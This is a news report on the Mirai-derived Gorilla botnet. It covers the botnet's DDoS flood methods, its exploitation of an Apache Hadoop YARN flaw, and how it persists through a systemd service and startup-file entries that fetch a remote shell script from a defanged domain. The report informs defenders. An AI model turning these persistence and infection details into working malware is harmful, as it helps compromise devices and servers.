Cybersecurity experts have uncovered a fresh botnet malware family known as Gorilla (also referred to as GorillaBot), which is based on the leaked source code of the infamous Mirai botnet.
The cybersecurity firm NSFOCUS announced its findings last month, revealing that the Gorilla botnet “issued more than 300,000 attack commands, showcasing an alarming level of attack density” during the period between September 4 and September 27, 2024. On average, the botnet launched at least 20,000 commands per day aimed at executing distributed denial-of-service (DDoS) attacks.
This botnet is reported to have launched attacks across over 100 countries, targeting sectors such as education, government, telecommunications, banking, gaming, and gambling. The countries most affected include China, the U.S., Canada, and Germany.
According to the Beijing-based company, Gorilla primarily employs techniques like UDP floods, ACK BYPASS floods, Valve Source Engine (VSE) floods, SYN floods, and ACK floods to carry out DDoS assaults. They noted that the connectionless nature of the UDP protocol facilitates arbitrary source IP spoofing, helping to generate substantial volumes of traffic.
In addition to supporting various CPU architectures, including ARM, MIPS, x86_64, and x86, the botnet is capable of connecting to one of five predefined command-and-control (C2) servers to await further DDoS commands.
Interestingly, the malware contains features designed to exploit a vulnerability in Apache Hadoop YARN RPC to gain remote code execution. This flaw has been exploited in the field as early as 2021, as reported by Alibaba Cloud and Trend Micro.
To maintain persistence on infected hosts, the botnet creates a service file named custom.service in the “/etc/systemd/system/” directory, ensuring it runs automatically whenever the system starts.
This service is responsible for fetching and executing a shell script (“lol.sh”) from a remote location (“pen.gorillafirewall[.]su”). Additionally, commands are inserted into the “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” files, which trigger the download and execution of the shell script upon system startup or user login.
NSFOCUS emphasized that the botnet not only introduced a variety of DDoS attack methods but also utilized encryption techniques commonly associated with the Keksec group to obscure key information. It employed multiple strategies to retain long-term control over IoT devices and cloud hosts, showcasing a heightened awareness of counter-detection as this new botnet family emerges.
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.